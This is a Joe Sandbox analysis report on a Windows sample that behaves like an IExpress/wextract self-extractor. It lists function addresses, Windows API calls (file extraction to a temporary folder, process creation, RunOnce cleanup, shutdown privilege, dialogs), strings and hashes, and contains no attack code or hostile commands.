CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 004C4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C4049
GetExitCodeProcess.KERNELBASE(?,?), ref: 004C405C
CloseHandle.KERNEL32(?), ref: 004C409C
CloseHandle.KERNEL32(?), ref: 004C40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 004C40DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 004C40E9

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 0b1387a1cd5dc844ef05c6bd31310ffec707c6f6984f488b02c5c3859672cd5c
Instruction ID: a997839cd2d8cc450a51712367ceae2e468522b37bfa3d79030dafda8765b141
Opcode Fuzzy Hash: 0b1387a1cd5dc844ef05c6bd31310ffec707c6f6984f488b02c5c3859672cd5c
Instruction Fuzzy Hash: 3031B135641218BBEBA09F66DD4DFAB7778EBD4704F1001AEF645D2261CA344D81CB19

Uniqueness

Uniqueness Score: -1.00%

Function 004C51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
Part of subcall function 004C468F: SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
Part of subcall function 004C468F: LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
Part of subcall function 004C468F: LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
Part of subcall function 004C468F: memcpy_s.MSVCRT ref: 004C46E5
Part of subcall function 004C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,004C2F4D,?,00000002,00000000), ref: 004C5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 004C5250

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Part of subcall function 004C6285: GetLastError.KERNEL32(004C5BBC), ref: 004C6285

Strings

<None>, xrefs: 004C5262
UPROMPT, xrefs: 004C51EF, 004C5230

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: a370737de5a19061f9deb9bf657157e72def5fccc229d8da59a0b3f34db66476
Instruction ID: 6d78eb76296daf01d56bfcf16f1094c34f6c3e9d8192772e36ff51a0ccd99c18
Opcode Fuzzy Hash: a370737de5a19061f9deb9bf657157e72def5fccc229d8da59a0b3f34db66476
Instruction Fuzzy Hash: 1B11E2BD200A05BBE3D86B725D5AF3B61DDDBC9398B10443FBA02D6290DE7C9C01462D

Uniqueness

Uniqueness Score: -1.00%

Function 004C52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(02AE4698,00000080,?,00000000), ref: 004C52F2
DeleteFileA.KERNELBASE(02AE4698), ref: 004C52FA
LocalFree.KERNEL32(02AE4698,?,00000000), ref: 004C5305
LocalFree.KERNEL32(02AE4698), ref: 004C530C
SetCurrentDirectoryA.KERNELBASE(004C11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 004C5363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C5334

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-3647970563
Opcode ID: c3593fcd52246a463d8241a580f05e7b1eb1286d1f12bfda6e1802a2540bd9f0
Instruction ID: 26fc18e45e4f155d8783f67ef737e303fe23cfdc36919f101f6646a61e8bd2a7
Opcode Fuzzy Hash: c3593fcd52246a463d8241a580f05e7b1eb1286d1f12bfda6e1802a2540bd9f0
Instruction Fuzzy Hash: 8D217F39500654DBDBE09B22DD09F6A77A0BB14794F04016FE845522B0CFB9AC84CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004C1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,004C538C,?,?,004C538C), ref: 004C2005
RegDeleteValueA.KERNELBASE(004C538C,wextract_cleanup1,?,?,004C538C), ref: 004C2017
RegCloseKey.ADVAPI32(004C538C,?,?,004C538C), ref: 004C2020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 004C1FFB
wextract_cleanup1, xrefs: 004C1FE7, 004C200F

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
API String ID: 849931509-1592051331
Opcode ID: bb7e24788a772d63a6016be60a7267f4db50c929cb0901a9a7fb2374506e0728
Instruction ID: 30807d90d90113fba5fbf2da5f1da4b56d3b3588ca63863fea0be4997d7ed960
Opcode Fuzzy Hash: bb7e24788a772d63a6016be60a7267f4db50c929cb0901a9a7fb2374506e0728
Instruction Fuzzy Hash: ACE0863455031CBBD7A18F92ED0EF6A7B29F700788F2001AEFA04A0161EBF55E24D60D

Uniqueness

Uniqueness Score: -1.00%

Function 004C4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 004C4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 004C4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C4D36, 004C4DE3

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-3647970563
Opcode ID: 31befea7add330b7802829ee675bce3fd82066fa918b32af1546265bcaa3d764
Instruction ID: 2118e6ab300eb36cf0f21222223fc536e78807f983bfdf56e90608bf803fbfaa
Opcode Fuzzy Hash: 31befea7add330b7802829ee675bce3fd82066fa918b32af1546265bcaa3d764
Instruction Fuzzy Hash: 3341153E2001019ACBA5AE29DB68FF673A5ABC5304B04466FD88397281DF39DE46C758

Uniqueness

Uniqueness Score: -1.00%

Function 004C4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004C4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004C4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 004C4C7E

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: b2d577e02ba5d803a99e8a6d7b6c919881bf9975d54474bd77f84e95784888a1
Instruction ID: 476d0cd356a7d97e0220d0b02c0869ce954a4a13f004c13864f6f9665223d2ec
Opcode Fuzzy Hash: b2d577e02ba5d803a99e8a6d7b6c919881bf9975d54474bd77f84e95784888a1
Instruction Fuzzy Hash: F7F0243660120CAFABA0DFB5CD08EBB77ACEB44354B08053FA802C1060EA34D924C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 004C487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,004C4A23,?,004C4F67,*MEMCAB,00008000,00000180), ref: 004C48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,004C4F67,*MEMCAB,00008000,00000180), ref: 004C4902

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f03128a07a9efecea29fccd4eea6098ba7f49fcec2203603d504263e8e6c1b9e
Instruction ID: a21a5c53fc685aee57112c1992b1bee550eee50c425bbf88a69e0fb8d0345d23
Opcode Fuzzy Hash: f03128a07a9efecea29fccd4eea6098ba7f49fcec2203603d504263e8e6c1b9e
Instruction Fuzzy Hash: 2F014BABE1157426F3A450394D98FB7551CCBDA734F1B033ABDAAE72D1D9684C0481F8

Uniqueness

Uniqueness Score: -1.00%

Function 004C4AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004C3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 004C369F
Part of subcall function 004C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004C36B2
Part of subcall function 004C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004C36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004C4B05

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 7156bff7d0c59e52f8ba85aa5d3907af659329ddace83ed35748092710a24f98
Instruction ID: de900c53326e29539f28deaaa769e9c0bf09492b5e3d7793a024bf81ef0d39d8
Opcode Fuzzy Hash: 7156bff7d0c59e52f8ba85aa5d3907af659329ddace83ed35748092710a24f98
Instruction Fuzzy Hash: 1A01C035200204ABDB948F19DD19FA37758E784726F08823EF939972E0DB74DC11CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004C658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CharPrevA.USER32(004C8B3E,004C8B3F,00000001,004C8B3E,-00000003,?,004C60EC,004C1140,?), ref: 004C65BA

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: a9963f52a10e176a52ec57002bda45c91f4481b87f79f95c24acd1bcc727a18d
Instruction ID: 698a67f63616bfb090414222df06f3e1a0863721d56cf15ca6ffbdc8c527766a
Opcode Fuzzy Hash: a9963f52a10e176a52ec57002bda45c91f4481b87f79f95c24acd1bcc727a18d
Instruction Fuzzy Hash: B3F02D76504250BBD3710919A884F67BFDD9B86350F3A816FE8DA83305CA5D4C4682A9

Uniqueness

Uniqueness Score: -1.00%

Function 004C621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004C623F

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Part of subcall function 004C6285: GetLastError.KERNEL32(004C5BBC), ref: 004C6285

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 875112d9574c14dffc119b40f105af3a7d6863a304c040a46685ccc1ece79dbf
Instruction ID: 4c1a4470c91ebaf2f497dc7c799b9a7469df6c0d7dbee7dbd528320396419782
Opcode Fuzzy Hash: 875112d9574c14dffc119b40f105af3a7d6863a304c040a46685ccc1ece79dbf
Instruction Fuzzy Hash: 36F0B4B46002086BE7D0FB758D06FBE32A8DB44304F4140BFA985D6191DD789D448658

Uniqueness

Uniqueness Score: -1.00%

Function 004C4B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,004C4FA1,00000000), ref: 004C4B98

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 586dbaa96310034c00e6090f43241b2a2b81333a8817fb46596ec59c2b390f98
Instruction ID: fc7bac58e5123aa49030a3e185a26f4e9a6f538888126994158ab2cf30c826d7
Opcode Fuzzy Hash: 586dbaa96310034c00e6090f43241b2a2b81333a8817fb46596ec59c2b390f98
Instruction Fuzzy Hash: 42F0FE71500B089E47E18E3A9D00F53BBE4AAE63613140D3F946FD21D0EB30A861CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004C66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,004C4777,?,004C4E38,?), ref: 004C66B1

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 78bc984ea4eaf92c41ae30a8502172115b5f66174dba030a7780b9919dbf3d86
Instruction ID: 714e3836600d8e2c54a22fc089fa59e57fe758bdb76d8db474f481133224016e
Opcode Fuzzy Hash: 78bc984ea4eaf92c41ae30a8502172115b5f66174dba030a7780b9919dbf3d86
Instruction Fuzzy Hash: AFB0927A222444426AA00A326C29A562845A6C123A7E55BA5F032C02E0CA3EC856E008

Uniqueness

Uniqueness Score: -1.00%

Function 004C4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 004C4CAA

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: beae30f592e29cb9fbf95d71c9b1addab2d14c77516026c09f92f6c8874f5333
Instruction ID: 24094cf1a468fa51488634cf9d226039cdc660f6826ec9e0c74d7274c434ca0a
Opcode Fuzzy Hash: beae30f592e29cb9fbf95d71c9b1addab2d14c77516026c09f92f6c8874f5333
Instruction Fuzzy Hash: 60B0123204420CB7CF401FC3EC09F853F1DE7C47A5F140010F60C450508A729420869B

Uniqueness

Uniqueness Score: -1.00%

Function 004C4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004C4CC8

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 753f8428e9c3970a4a230da89f11e03fcd28fd0af8711510343aaa9012c3a7d8
Instruction ID: 19629bb6e89893b86fd9b9b3fcd2aefdf3c61bbac10f640f73867096055369bf
Opcode Fuzzy Hash: 753f8428e9c3970a4a230da89f11e03fcd28fd0af8711510343aaa9012c3a7d8
Instruction Fuzzy Hash: C0B0123100010CB78F001F43EC08C453F1DD6C02A47000020F50C410218B339821858A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004C5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,00000000,?,?), ref: 004C5CEE
GetModuleFileNameA.KERNEL32(004C8B3E,00000104,00000000,?,?), ref: 004C5DFC
CharUpperA.USER32(?), ref: 004C5E3E
CharUpperA.USER32(-00000052), ref: 004C5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 004C5F6F
CharUpperA.USER32(?), ref: 004C5FA7
CharUpperA.USER32(-0000004E), ref: 004C6008
CharUpperA.USER32(?), ref: 004C60AA
CloseHandle.KERNEL32(00000000,004C1140,00000000,00000040,00000000), ref: 004C61F1
ExitProcess.KERNEL32 ref: 004C61F8

Strings

:, xrefs: 004C6118
", xrefs: 004C5D78
", xrefs: 004C612D
RegServer, xrefs: 004C5F66

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: b07e9b8a20c6421719e4611b9d8f0971843e0e223644a7f29143f55204f23b69
Instruction ID: 26c7cd743eedd5d8171b6722748c56c7bd9850d051d857f983e5320e241975d6
Opcode Fuzzy Hash: b07e9b8a20c6421719e4611b9d8f0971843e0e223644a7f29143f55204f23b69
Instruction Fuzzy Hash: 5CD11879A04A545EDBF58B398C48FBF3761A716304F1480AFD486D6291DA7CAEC2CB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004C1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 004C1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 004C1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 004C1FD3

Strings

SeShutdownPrivilege, xrefs: 004C1F28

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 1959168bff106bcc0297da005778ef8e8d2724e30701f85f25c604eb04ad7bd0
Instruction ID: eb921ad0bf6b7cecf53dff4997d21afd570b9a6d22f2f8135757ebbff480339a
Opcode Fuzzy Hash: 1959168bff106bcc0297da005778ef8e8d2724e30701f85f25c604eb04ad7bd0
Instruction Fuzzy Hash: CC21FE75B402057BDBA05FA29C4DF7F76B8DB86754F20002EFA02D6192D77D8801926E

Uniqueness

Uniqueness Score: -1.00%

Function 004C6CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,004C6E26,004C1000), ref: 004C6CF7
UnhandledExceptionFilter.KERNEL32(&nL,?,004C6E26,004C1000), ref: 004C6D00
GetCurrentProcess.KERNEL32(C0000409,?,004C6E26,004C1000), ref: 004C6D0B
TerminateProcess.KERNEL32(00000000,?,004C6E26,004C1000), ref: 004C6D12

Strings

&nL, xrefs: 004C6CFD

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &nL
API String ID: 3231755760-1200990418
Opcode ID: 3747062f4097c2a87e96c766a0944f2c10dee68472cb2a9a7555370eb7d6ddff
Instruction ID: f56bf8d27d3fda72d466effeebd99633c62b73baa688faca5832069ef91f1a31
Opcode Fuzzy Hash: 3747062f4097c2a87e96c766a0944f2c10dee68472cb2a9a7555370eb7d6ddff
Instruction Fuzzy Hash: BCD0C93200010CBFDB802BF1EC0CE593F28EB4821AF4D4020F319C2020CE3244618B5B

Uniqueness

Uniqueness Score: -1.00%

Function 004C3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32(000003E8,004C8598,00000200), ref: 004C3271
GetDesktopWindow.USER32 ref: 004C33E2
SetWindowTextA.USER32(?,smo), ref: 004C33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 004C3410
GetDlgItem.USER32(?,00000836), ref: 004C3426
EnableWindow.USER32(00000000), ref: 004C342D
EndDialog.USER32(?,00000000), ref: 004C343F

Strings

smo, xrefs: 004C33F1
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C32E2, 004C32E7, 004C3331, 004C3344, 004C335B, 004C336A

Memory Dump Source

